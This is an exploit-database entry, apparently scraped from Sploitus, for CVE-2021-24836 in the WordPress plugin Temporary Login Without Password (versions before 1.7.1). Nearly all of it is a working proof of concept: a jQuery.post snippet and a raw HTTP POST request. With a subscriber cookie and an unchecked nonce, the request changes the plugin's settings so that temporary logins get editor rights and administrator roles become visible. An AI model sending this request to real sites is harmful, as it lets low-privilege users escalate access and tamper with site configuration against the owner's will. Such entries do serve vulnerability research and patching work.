Exploit for Temporary Login Without Password < 1.7.1 - Subscriber+ Plugin's Settings Update CVE-2021-24836

Name: Exploit for Temporary Login Without Password < 1.7.1 - Subscriber+ Plugin's Settings Update CVE-2021-24836
Rating: 5 (96 reviews)

2021-11-15 | CVSS 4.0

## https://sploitus.com/exploit?id=WPEX-ID:15EED13F-3195-4F5D-8933-36695C830F4F
jQuery.post("https://example.com/wp-admin/index.php", {
"wtlwp-nonce": "foo", // Not validated
tlwp_settings_data: {
  default_role: "editor",
  default_expiry_time: "month_after_access",
  visible_roles: ["editor", "administrator"],
  default_redirect_to: "wp_dashboard"
}
})

POST /wp-admin/index.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 288
Connection: close
Cookie: [subscriber+]

wtlwp-nonce=foo&tlwp_settings_data%5Bdefault_role%5D=editor&tlwp_settings_data%5Bdefault_expiry_time%5D=month_after_access&tlwp_settings_data%5Bvisible_roles%5D%5B%5D=editor&tlwp_settings_data%5Bvisible_roles%5D%5B%5D=administrator&tlwp_settings_data%5Bdefault_redirect_to%5D=wp_dashboard